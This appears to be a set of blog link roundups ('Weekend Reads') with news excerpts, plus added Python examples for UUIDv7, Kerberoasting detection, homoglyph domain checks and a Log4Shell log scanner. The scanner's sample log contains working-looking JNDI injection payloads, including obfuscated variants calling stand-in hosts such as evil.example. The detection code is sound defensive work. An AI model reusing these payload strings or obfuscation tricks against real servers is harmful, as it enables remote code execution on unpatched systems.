Weekend Reads 101324


A study by the US General Services Administration (GSA) has revealed that five remote identity verification (RiDV) technologies are unreliable, inconsistent, and marred by bias across different demographic groups.


This time, he included a PoC that caused the ChatGPT app for macOS to send a verbatim copy of all user input and ChatGPT output to a server of his choice.


In the quest to revolutionize medicine, our bodies are becoming living laboratories. By 2030, it's estimated that bioprinting could address up to 20% of the organ transplant waiting list globally.


Consider this: For every 1,000 human users in your organization, you likely have 10,000 non-human connections or credentials. Some estimates suggest the ratio could be as high as 45-to-1.


The U.S. Department of Justice (DOJ) is considering recommending that a federal judge force Google to sell parts of its business in a bid to eliminate its alleged monopoly on online search, according to a court filing Tuesday.


A US jury has found that employment practices at Cognizant constitute discriminatory conduct toward non-Indian workers in a case that originated in 2013 and claimed the tech giant favored H-1B visa holders from India over local workers.


Consumers are victims of online scams and have their data stolen, but they are lagging on adopting security tools to protect themselves.


At the end of its 2024 term, the Supreme Court decided two cases with a significant, if not historic, impact on the ability of federal agencies to regulate areas of the national economy within their jurisdiction, including the FCC’s ability to regulate telecommunications and Internet service providers.


He criticized the reliance on just two or three ultra-high capacity cables driven by over-the-top (OTT) providers such as major tech companies, which have different network requirements from traditional telecom providers.


The Wall Street Journal is reporting that Chinese hackers (Salt Typhoon) penetrated the networks of US broadband providers, and might have accessed the backdoors that the federal government uses to execute court-authorized wiretap requests.


The specification for UUIDs was written in 2005 and is defined in RFC 4122. This specification has served the industry fairly well. Even so, there have been many other mechanisms for generating unique identifiers to try to make up for the shortcomings of the original specification.
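
The shortcomings being worked around are concrete: a version 1 UUID embeds the generating host's MAC address and clock, and a version 4 UUID is random and therefore useless as a sortable database key. The time-ordered layout that RFC 9562 (which obsoleted RFC 4122 in 2024) standardizes as UUIDv7 is the usual answer. The following is an added example, not code from the linked article: a minimal UUIDv7 generator written against the RFC 9562 bit layout on top of Python's standard `uuid` module (the `ts_ms` and `rand` parameters exist only so the layout can be checked deterministically), plus a comparison with v4 ordering.

```python
import os
import time
import uuid

def uuid7(ts_ms=None, rand=None):
    """Build a UUIDv7 (RFC 9562 layout): 48-bit Unix-epoch milliseconds, version, 74 random bits.

    ts_ms and rand (exactly 10 bytes) are injectable only so the bit layout can be checked
    deterministically; normal callers pass nothing and get the wall clock plus os.urandom.
    """
    if ts_ms is None:
        ts_ms = time.time_ns() // 1_000_000
    if rand is None:
        rand = os.urandom(10)
    if not 0 <= ts_ms < (1 << 48):
        raise ValueError("timestamp does not fit in 48 bits")
    if len(rand) != 10:
        raise ValueError("need exactly 10 random bytes")
    r = int.from_bytes(rand, "big")          # 80 bits; only 74 are used
    value = ts_ms << 80                      # unix_ts_ms: bits 127..80
    value |= 0x7 << 76                       # ver = 7:     bits 79..76
    value |= (r >> 68) << 64                 # rand_a:      bits 75..64 (12 bits)
    value |= 0b10 << 62                      # var = 10:    bits 63..62
    value |= r & ((1 << 62) - 1)             # rand_b:      bits 61..0  (62 bits)
    return uuid.UUID(int=value)

def uuid7_timestamp_ms(u):
    """Recover the creation time (ms since the Unix epoch) that a UUIDv7 carries in the clear."""
    if u.version != 7:
        raise ValueError("not a UUIDv7")
    return u.int >> 80

def sorts_in_creation_order(uuids):
    """True if lexical order of the canonical strings equals the order the UUIDs were made in."""
    return sorted(str(u) for u in uuids) == [str(u) for u in uuids]

def demo():
    """Compare v4 (random) and v7 (time-ordered) identifiers generated back to back.

    The v7 timestamps are constructed (a fixed epoch offset plus i) so the demo is repeatable.
    """
    v7s = [uuid7(ts_ms=1_700_000_000_000 + i) for i in range(5)]
    v4s = [uuid.uuid4() for _ in range(5)]
    return {
        "v7_ordered": sorts_in_creation_order(v7s),
        "v4_ordered": sorts_in_creation_order(v4s),   # usually False: nothing ties v4 to time
        "v7_timestamp_ms": uuid7_timestamp_ms(v7s[0]),
    }

if __name__ == "__main__":
    print(demo())
```

Two caveats for the security reader: `uuid7_timestamp_ms` shows that a v7 identifier discloses exactly when a record was created (and, across a batch, roughly how many were created), so it is a primary key, not a secret; and none of the UUID versions is a substitute for `secrets.token_urlsafe()` when the value has to act as a bearer token.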


Because Kerberoasting enables cyberthreat actors to steal credentials and quickly navigate through devices and networks, it’s essential for administrators to take steps to reduce potential cyberattack surfaces.
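
Reducing the attack surface (long random passwords on service accounts, AES-only tickets, group managed service accounts) is the fix; the detection side is the other half a practitioner wants. Kerberoasting leaves a distinctive trace in Event ID 4769 (a Kerberos service ticket was requested): one user account pulling tickets for many different service accounts in a short burst, typically with RC4 (encryption type 0x17) requested so the hash is cheap to crack. The following is an added example, not code from the linked article: a small detector over a constructed JSON-lines export of 4769 events. Field names follow the Windows event schema (`TargetUserName` is the requesting principal, `ServiceName` the account whose ticket was issued); the JSON export format, the sample values and the thresholds are assumptions.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Event ID 4769 records exported as JSON lines. Values are made up:
# "jdoe" bursts through three service accounts with RC4; "asmith" touches the same
# services with AES; "WS01$" is a machine account; "bob" asks for one ticket.
SAMPLE_EVENTS = [
    '{"TimeCreated":"2024-10-12T09:15:01","TargetUserName":"jdoe@CORP.LOCAL","ServiceName":"svc-sql","TicketEncryptionType":"0x17","IpAddress":"10.0.0.45","Status":"0x0"}',
    '{"TimeCreated":"2024-10-12T09:15:12","TargetUserName":"jdoe@CORP.LOCAL","ServiceName":"svc-web","TicketEncryptionType":"0x17","IpAddress":"10.0.0.45","Status":"0x0"}',
    '{"TimeCreated":"2024-10-12T09:15:30","TargetUserName":"jdoe@CORP.LOCAL","ServiceName":"svc-backup","TicketEncryptionType":"0x17","IpAddress":"10.0.0.45","Status":"0x0"}',
    '{"TimeCreated":"2024-10-12T09:40:00","TargetUserName":"jdoe@CORP.LOCAL","ServiceName":"svc-files","TicketEncryptionType":"0x17","IpAddress":"10.0.0.45","Status":"0x0"}',
    '{"TimeCreated":"2024-10-12T09:16:00","TargetUserName":"asmith@CORP.LOCAL","ServiceName":"svc-sql","TicketEncryptionType":"0x12","IpAddress":"10.0.0.80","Status":"0x0"}',
    '{"TimeCreated":"2024-10-12T09:16:05","TargetUserName":"asmith@CORP.LOCAL","ServiceName":"svc-web","TicketEncryptionType":"0x12","IpAddress":"10.0.0.80","Status":"0x0"}',
    '{"TimeCreated":"2024-10-12T09:16:09","TargetUserName":"asmith@CORP.LOCAL","ServiceName":"svc-backup","TicketEncryptionType":"0x12","IpAddress":"10.0.0.80","Status":"0x0"}',
    '{"TimeCreated":"2024-10-12T09:17:00","TargetUserName":"WS01$@CORP.LOCAL","ServiceName":"WS02$","TicketEncryptionType":"0x17","IpAddress":"10.0.0.51","Status":"0x0"}',
    '{"TimeCreated":"2024-10-12T09:18:00","TargetUserName":"bob@CORP.LOCAL","ServiceName":"svc-sql","TicketEncryptionType":"0x17","IpAddress":"10.0.0.77","Status":"0x0"}',
    '{"TimeCreated":"2024-10-12T09:19:00","TargetUserName":"jdoe@CORP.LOCAL","ServiceName":"svc-print","TicketEncryptionType":"0x17","IpAddress":"10.0.0.45","Status":"0x1f"}',
]

RC4_HMAC = "0x17"   # ticket encryption type attackers request because the hash cracks fastest

def parse_4769(line):
    """Parse one JSON-lines 4769 record into the fields the rule needs (realm stripped, lower-cased)."""
    ev = json.loads(line)
    return {
        "time": datetime.fromisoformat(ev["TimeCreated"]),
        "account": ev["TargetUserName"].split("@")[0].lower(),   # requesting principal
        "service": ev["ServiceName"].split("@")[0].lower(),      # service account whose ticket was issued
        "enc": ev["TicketEncryptionType"],
        "ip": ev["IpAddress"],
        "status": ev["Status"],
    }

def is_candidate(ev):
    """Successful RC4 service-ticket requests by a user account for a non-machine, non-krbtgt service."""
    return (ev["status"] == "0x0" and ev["enc"] == RC4_HMAC
            and not ev["account"].endswith("$")
            and not ev["service"].endswith("$") and ev["service"] != "krbtgt")

def find_kerberoasting(lines, min_services=3, window=timedelta(minutes=5)):
    """Flag accounts that obtain RC4 tickets for >= min_services distinct services within window.

    Returns {account: {"services": [...], "ips": [...]}} for the first window that trips the rule.
    """
    per_account = defaultdict(list)
    for line in lines:
        ev = parse_4769(line)
        if is_candidate(ev):
            per_account[ev["account"]].append(ev)

    flagged = {}
    for account, events in per_account.items():
        events.sort(key=lambda e: e["time"])
        start = 0
        for end in range(len(events)):               # sliding window over time-ordered events
            while events[end]["time"] - events[start]["time"] > window:
                start += 1
            in_window = events[start:end + 1]
            services = {e["service"] for e in in_window}
            if len(services) >= min_services:
                flagged[account] = {
                    "services": sorted(services),
                    "ips": sorted({e["ip"] for e in in_window}),
                }
                break
    return flagged

if __name__ == "__main__":
    for account, info in find_kerberoasting(SAMPLE_EVENTS).items():
        print(f"[ALERT] {account} pulled RC4 service tickets for {info['services']} from {info['ips']}")
```

The rule deliberately keys on RC4 because a domain where service accounts are AES-only turns that signal into a near-zero-noise alert; a tool that requests AES tickets instead will only show up through the burst of distinct service names, which is why the window logic is kept separate from the encryption-type filter.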

Weekend Reads 100624


Thanks to the popularity and widespread success of ChatGPT, most IT users are familiar with the concept of a large language model (LLM). But how does an LLM apply to network operations?


If you don’t know what you’re operating on, or what the expected output range might be, then maybe you ought not to be operating on that data in the first place. But now these languages have gotten into the wild and we’ll never be able to hunt them down and kill them soon enough for my liking, or for the greater good.


We then analyze ten data sets spanning industry and academic sources, across four years (2019-2023), to find and explain discrepancies based on data sources, vantage points, methods, and parameters.


Phishing attacks, which trick users into sharing private data, have been a major security threat for years. According to a 2023 FBI report, it is the top digital crime type.


A test account that’s shared among many can be used by anyone who happens to have the password. This leaves a trail of poorly managed or unmanaged accounts that only increases your attack surface.


As radio host Mark Davis put it recently, “ultimately everything AI does is go in search of something that some human being said or wrote sometime.”


One of the most exciting recent developments in web performance is Zstandard (zstd) — a new compression algorithm that we have found compresses data 42% faster than Brotli while maintaining almost the same compression levels.


In this paper, we introduce a generic security model for Web services based on three dimensions of resolution, transaction, and identification.


For generative artificial intelligence (GenAI) models, the concept of the Promethean dilemma has so far been discussed, starting with whether general access to GenAI systems should be permitted for public use, given their black box nature and tendency to confabulate.


All crypto assets in 2024 amounted to only 0.5% of the world’s money supply. But they have enabled a lot of troublesome speculative behavior as well as illicit activities such as money laundering and tax evasion, financial scandals, illegal gambling, and financing of terrorism and the drug trade. Some governments would like to provide alternatives.


Threat actors can often find targeting certain organizations too much of a challenge. So they need to go through what we can consider back channels—suppliers, vendors, or service providers.


Most exploitable GPU vulnerabilities are in the implementation of the GPU kernel mode modules. These modules are pieces of code that load/unload during runtime, extending functionality without the need to reboot the device.


Memory safety vulnerabilities remain a pervasive threat to software security. At Google, we believe the path to eliminating this class of vulnerabilities at scale and building high-assurance software lies in Safe Coding, a secure-by-design approach that prioritizes transitioning to memory-safe languages.


Session hijacking looks quite different these days. No longer network-based, modern session hijacking is an identity-based attack performed over the public internet targeting cloud-based apps and services.

Weekend Reads 092824


Instead, Broadcom is now experimenting with co-packaging the optics directly into the GPUs themselves.


With K-12 schools back in session across the nation, millions of students are adjusting to a new learning environment — a cellphone-free classroom or, in some cases, a phone-free school day.


Being at the core of the Internet places the DNS under a lot of pressure. New forms of DNS abuse emerge each year, disputes over domain names persist, and all the while, the Internet just keeps getting bigger.


The censorship war has hit a flashpoint. Late last month, Brazil banned Elon Musk’s social media site, X, after Musk refused a government order to suppress seven dissident accounts.


This raises a question. If someone is situated in South America and wants to access youtu.be, is their performance going to be impacted (assuming they have to do the entire recursive lookup with no cache)?


ODA focuses on identifying macroscopic Internet outages, such as outages that affect a significant portion of the population within either a geographic region or an Autonomous System (AS).


For practitioners, this study provides a rich set of criteria that can be used for evaluating their projects, as well as strong evidence of the importance of considering not only project execution, but also post-project outcomes and impacts in the evaluation.


As if we didn't have a long enough list of problems to worry about, Lumen researchers at its Black Lotus Labs recently released a blog post saying that three U.S. ISPs and one in India were hacked this summer.


While the usage of internationalized domain names (IDNs) has allowed organizations the world over to enter the global market using their native-language domain names, it can also enable cyber attackers to craft look-alikes of legitimate domains they wish to spoof.
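
The mechanism behind the look-alikes is that the browser and the DNS see the ASCII "A-label" (the `xn--` punycode form) while the user sees the decoded Unicode "U-label", and several non-Latin letters render identically to Latin ones. The following is an added example, not code from the linked article: it converts between the two forms with Python's standard IDNA codec and then applies the two checks a practitioner would put in a mail gateway or a brand-monitoring feed, a mixed-script test and a confusable "skeleton" comparison against protected names. The homoglyph table is a small constructed subset (production code should use the Unicode confusables data), and the sample hostnames and protected names are constructed.

```python
import unicodedata

# Constructed subset of Cyrillic/Greek/Latin homoglyphs mapped to their ASCII look-alikes.
# Not exhaustive: real deployments should load the Unicode confusables.txt table.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j", "\u04bb": "h",
    "\u04cf": "l", "\u03b1": "a", "\u03bf": "o", "\u03bd": "v", "\u0131": "i",
}

def to_unicode(hostname):
    """A-label (xn--...) or plain ASCII hostname -> U-label form, via the stdlib IDNA codec."""
    return hostname.encode("ascii").decode("idna")

def to_ascii(hostname):
    """U-label hostname -> A-label (punycode) form, the string that actually hits the resolver."""
    return hostname.encode("idna").decode("ascii")

def scripts_in(label):
    """Scripts used by the letters of one label, taken from the first word of each character name."""
    return {unicodedata.name(ch, "UNKNOWN").split(" ")[0] for ch in label if ch.isalpha()}

def skeleton(label):
    """Replace confusable characters with their ASCII look-alike, then NFKC-fold and lowercase."""
    mapped = "".join(CONFUSABLES.get(ch, ch) for ch in label)
    return unicodedata.normalize("NFKC", mapped).lower()

def check_lookalike(hostname, protected):
    """Classify hostname against a set of protected ASCII names.

    Returns the decoded Unicode form, whether any label mixes scripts, the folded skeleton,
    and the protected name the hostname visually impersonates (None if it is not a look-alike).
    """
    unicode_form = to_unicode(hostname)
    labels = unicode_form.split(".")
    skel = ".".join(skeleton(label) for label in labels)
    impersonates = skel if skel in protected and skel != unicode_form.lower() else None
    return {
        "unicode": unicode_form,
        "mixed_script": any(len(scripts_in(label)) > 1 for label in labels),
        "skeleton": skel,
        "impersonates": impersonates,
    }

if __name__ == "__main__":
    protected = {"apple.com", "paypal.com"}
    # Constructed samples: a mixed-script spoof, an all-Cyrillic spoof, a benign IDN, the real name.
    samples = [
        "xn--pple-43d.com",                              # Cyrillic 'a', Latin 'pple'
        to_ascii("\u0430\u0440\u0440\u04cf\u0435.com"),  # every letter Cyrillic
        "xn--mnchen-3ya.de",                             # muenchen.de, legitimate IDN
        "apple.com",
    ]
    for host in samples:
        print(host, check_lookalike(host, protected))
```

The second sample is the reason both checks are needed: a label written entirely in Cyrillic passes a mixed-script test (browsers rely on that test to decide whether to show the Unicode form) yet still folds to `apple.com`, so the skeleton comparison is what catches it.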


In Texas, for example, the chatbot consumes an estimated 235 milliliters of water to generate one 100-word email. That same email drafted in Washington, on the other hand, would require 1,408 milliliters (nearly a liter and a half).


Fiber splicing is joining two optical fibers to create a continuous, low-loss, and highly efficient optical path.


Efforts to curb illegal online content through domain shutdowns are proving ineffective and carry significant risks, according to a new report by eco and its topDNS initiative.


The majority of open source project maintainers are not being paid for their work, spend three times as much time on security than they did three years ago, and have become less trusting of contributors following the xz backdoor, according to open source package security firm Tidelift.

Weekend Reads 090724


A federal judge struck down a Biden administration rule on Tuesday that banned employers from using noncompete agreements, which would have affected the contracts of millions of Americans.


The Open Compute Project, the org best known for offering designs for hyperscale hardware, has rounded up AWS, Google, Meta, and Microsoft to help it test concrete.


Recent trends show that ransomware attacks continue to grow more advanced and persistent.


When you are designing applications that run across the scale of an entire datacenter and that are comprised of hundreds to thousands of microservices running on countless individual servers and that have to be called within a matter of microseconds to give the illusion of a monolithic application, building fully connected, high bi-section bandwidth Clos networks is a must.


The National Institute of Standards and Technology (NIST) just released three finalized standards for post-quantum cryptography (PQC) covering public key encapsulation and two forms of digital signatures. In progress since 2016, this achievement represents a major milestone towards standards development that will keep information on the Internet secure and confidential for many years to come.


Linearity is one of the greatest success stories in mathematics. According to Encyclopedia Britannica, “Unlike other parts of mathematics that are frequently invigorated by new ideas and unsolved problems, linear algebra is very well understood.”


The Turing test could be useful for checking whether a customer service chatbot, for instance, is interacting with people in a way that those people are comfortable with, demonstrating what Jones calls a flexible social intelligence. Whether it can identify more general intelligence, however, is difficult to say.


But in at least some situations, the Supreme Court held this spring in a case called Lindke v. Freed, it is illegal to block other users. If you are a government official, and you are using social media as part of your job duties, those users may have a First Amendment right against being blocked.


The recent emergence of generative artificial intelligence and the arrival of assistive agents based on this technology have the potential to offer further assistance to searchers, especially those engaged in complex tasks.


Design and engineering teams increasingly are turning to both classical AI and generative AI to rethink, reinvent, and remake the modern microchip.


In a groundbreaking development for quantum communication, researchers at Qunnect Inc. have successfully achieved the automated distribution of polarization-entangled photons over New York City’s existing fiber network.


The internet is currently controlled through searching, and if Google single-handedly dominates the means through which searching works, then Google effectively controls the internet.

Weekend Reads 083024


Microsoft on Thursday disclosed four medium-severity security flaws in the open-source OpenVPN software that could be chained to achieve remote code execution (RCE) and local privilege escalation (LPE).


Cybersecurity researchers have discovered multiple critical flaws in Amazon Web Services (AWS) offerings that, if successfully exploited, could result in serious consequences.


As many as 10 security flaws have been uncovered in Google's Quick Share data transfer utility for Android and Windows that could be assembled to trigger a remote code execution (RCE) chain on systems that have the software installed.


SiFive has announced the launch of its latest core for datacenters, the P870-D, and claims it has a leg up on Arm’s Neoverse N2 in density for AI.


Unstoppable Domains (UD), a provider of Web3 domain names and digital identities, has been officially accredited by the Internet Corporation for Assigned Names and Numbers (ICANN).


CENTR, the association overseeing European country code top-level domain (ccTLD) registries, has announced the public release of its Domain Crawler Project code.


Remote SIM provisioning (RSP) for consumer devices is the protocol specified by the GSM Association for downloading SIM profiles into a secure element in a mobile device. The process is commonly known as eSIM, and it is expected to replace removable SIM cards.


The WhoisXML API research team analyzed more than 7.3 million domains registered between 1 and 31 July 2024 in this post to identify five of the most popular registrars, top-level domain (TLD) extensions, and other global domain registration trends.


Unit 42 monitors ransomware and extortion leak sites closely to keep tabs on threat activity. We reviewed compromise announcements from 53 dedicated leak sites in the first half of 2024 and found 1,762 new posts.


Cybersecurity researchers have disclosed a security flaw impacting Microsoft Azure Kubernetes Services that, if successfully exploited, could allow an attacker to escalate their privileges and access credentials for services used by the cluster.


To illustrate the complexity and severity of modern application attacks, let's examine an attack against the infamous Log4Shell vulnerability (CVE-2021-44228) that sent shockwaves through the cybersecurity world in late 2021.
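
What made Log4Shell hard to handle in practice was not the basic `${jndi:ldap://...}` string but the lookup nesting Log4j's substitution engine allows, which let attackers hide it from naive signatures (`${${lower:j}ndi:...}`, `${::-j}` default-value tricks, URL-encoding in a query string). The following is an added example, not code from the linked article: a log scanner that URL-decodes each line, collapses the common nested lookups innermost-first the way the substitution engine would, and only then looks for the JNDI lookup and pulls out the protocol and callback host for triage. The Apache-style access-log lines are constructed, and `reduce_lookup` models only the `lower`, `upper` and `:-` default substitutions.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access-log lines: three carry JNDI lookups (plain, nested and
# case-mangled, URL-encoded in the query string); two are benign.
SAMPLE_LOG = [
    '10.1.2.3 - - [10/Dec/2021:22:01:15 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '198.51.100.9 - - [10/Dec/2021:22:02:40 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${${lower:j}${upper:n}di:${::-l}dap://evil.example:1389/x}"',
    '192.0.2.44 - - [10/Dec/2021:22:03:02 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F192.0.2.5%3A1099%2Fobj%7D HTTP/1.1" 200 88 "-" "curl/7.79.1"',
    '10.1.2.9 - - [10/Dec/2021:22:03:30 +0000] "GET /index.html HTTP/1.1" 200 3071 "-" "Mozilla/5.0"',
    '10.1.2.9 - - [10/Dec/2021:22:03:31 +0000] "GET /report?t=${date:yyyy} HTTP/1.1" 200 3071 "-" "Mozilla/5.0"',
]

INNER = re.compile(r"\$\{([^${}]*)\}")   # a ${...} with nothing nested inside it
JNDI = re.compile(r'\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//([^/}\s"]+)', re.IGNORECASE)

def reduce_lookup(body):
    """Resolve one innermost lookup body for the substitutions attackers lean on.

    ${x:-default} -> default (covers ${::-j} and ${env:UNSET:-j}), ${lower:X} -> x, ${upper:x} -> X.
    Any other lookup (jndi, date, env without a default, ...) is left in place untouched.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    return "${" + body + "}"

def deobfuscate(text, max_rounds=20):
    """URL-decode, then collapse nested lookups innermost-first until nothing changes."""
    text = unquote(text)
    for _ in range(max_rounds):                 # bounded: a hostile line cannot loop us forever
        new = INNER.sub(lambda m: reduce_lookup(m.group(1)), text)
        if new == text:
            break
        text = new
    return text

def scan_line(line):
    """Return (protocol, host) for a JNDI lookup found in the line after de-obfuscation, else None."""
    m = JNDI.search(deobfuscate(line))
    return (m.group(1).lower(), m.group(2)) if m else None

def scan_log(lines):
    """Return [(line_number, protocol, host)] for every line that carries a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        found = scan_line(line)
        if found:
            hits.append((n, *found))
    return hits

if __name__ == "__main__":
    for n, proto, host in scan_log(SAMPLE_LOG):
        print(f"line {n}: JNDI {proto} lookup to {host}")
```

Scanning logs is after-the-fact: by the time the line is written the lookup may already have run. It is still worth doing because the callback host is the indicator that tells you which systems to pull for forensics, and because the de-obfuscation step is the same one a WAF rule needs if it is to be more than a `${jndi:` string match.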


When it comes to breach disclosures, today’s chief information security officers (CISOs) are struggling with an especially turbulent regulatory environment.


Data centers are part of the vital infrastructure behind consumer-facing services, and they now find themselves in the crosshairs. By weaponizing permitting and zoning laws, emissions and electricity regulations, and tax hikes, policymakers aim to sabotage operations altogether.


Inspired by recent presentations and discussions around Tetragon, we picked out the top security observability use cases – and what we find are extensive use cases deep across the security application landscape.


Over the past few years, TV makers have seen rising financial success from TV operating systems that can show viewers ads and analyze their responses.

Weekend Reads 081624


Beware of Internet FORCES aiming to change your mind or direct your decisions! That acronym, coined by behavioral scientist Patrick Fagan, helps people know when they’re being “nudged.”


Enter your name into an internet search engine and the first few results will probably include detailed profiles of you compiled by “people-search” websites with names like Intelius, PeopleFinders, and Spokeo.


Following the July 19 outages caused by a bad update, the cybersecurity firm faces shareholder lawsuits and pressure to pay damages for at least one major customer, Delta Airlines. Will software liability follow?


Since 1998 — the last year Congress passed a major law to reform the tech industry and protect children in the virtual space — a lot has changed.


According to a damning report from 404 Media, backed with internal Slack chats, emails, and documents obtained by the outlet, Nvidia helped itself to “a human lifetime visual experience worth of training data per day,” Ming-Yu Liu, vice president of Research at Nvidia and a Cosmos project leader, admitted in a May email.


It has been an enduring fascination to see how we could use packet networking in the context of digital communications in space.


At a recent conference I attended, a speaker referenced media ecologist Neil Postman and his “rules” for evaluating the pros and cons of any given technological development.


In the 18th century, Wolfgang von Kempelen's victorious mechanical Turk (1770) amazed the world, see Figs. 1-4. However, there was a person hidden inside.


LibreQoS is an open source project and the subject of a popular recent APNIC Academy webinar. Responding to feedback given at the webinar, this post will look at the features of LibreQoS.


Huawei Cloud has developed a network monitoring tool that, when used in production on three of its own regions, was able to observe more of its infrastructure than existing tools, and revealed issues that previously evaded human efforts.


Decoupling authorization from your main application code makes authorization more scalable, easier to maintain, and simpler to integrate with your components. However, these benefits are difficult to realize if you don’t consciously plan for them within your authorization implementation.


In this episode of PING, Casper Schutijser and Ralph Koning from SIDN Labs in the Netherlands discuss their post-quantum testbed project.

Weekend Reads 081024


Network observability tools provide information on the health and behavior of applications, offer insights into end-user experience, and detect anomalies that are indicative of security incidents.


Maestro is a general-purpose, horizontally scalable workflow orchestrator designed to manage large-scale workflows such as data pipelines and machine learning model training pipelines.


It might be time to get the pens and notebooks back out and shut off the keyboard for a while. Just pretend you’re back in the first grade and don’t have a minicomputer in your back pocket.


Intel has finally provided an update on instability issues on 13th-gen and 14th-gen CPUs. An update posted by Thomas Hannaford, Intel’s communications manager, pins the instability on an error in the microcode that requests incorrect voltage numbers, leading to instability in the processor.


Separation agreements Meta gave to employees during mass 2022 layoffs are illegal, a US judge has decided, and the reasoning could have implications far beyond Zuckercorp.


In 1940, thirteen percent of the U.S. population lived in suburbs. In 2010, it was half. An analysis by demographer Wendell Cox of population trends during the 2010s showed that 92 percent of all growth in major metropolitan areas was in the suburbs and exurbs, a trend that well preceded the pandemic.


Searchable Encryption has long been a mystery. An oxymoron. An unattainable dream of cybersecurity professionals everywhere.


Two US senators have urged the FTC to probe and potentially prosecute three automakers that allegedly unlawfully sold motorists’ personal data for pennies.


As the COVID-19 pandemic came to an end, a number of large companies pushed for their workers to return to the office five days a week — a policy that prompted many employees to “quiet quit” in protest.


At what was billed as a “fireside chat” at Tel Aviv University in June 2023, the very first question from the audience posed to OpenAI CEO Sam Altman and chief scientist Ilya Sutskever was, “Could open source LLMs (large language models) potentially match GPT-4’s abilities without additional technical advances, or is there a ‘secret sauce’ in GPT-4 unknown to the world that sets it apart from the other models?”


The blame game doesn’t stop there. One link in this chain of infamy hasn’t received the attention it deserves – but this link took what should have been a small hiccup and turned it into a global meltdown.


Now it seems that AI itself might be our best defense against AI fakery after an algorithm has identified telltale markers of AI videos with over 98% accuracy.


Rolls-Royce has cleared a key hurdle in the race to build Britain’s first mini-nuclear power plant as competition across Europe ramps up.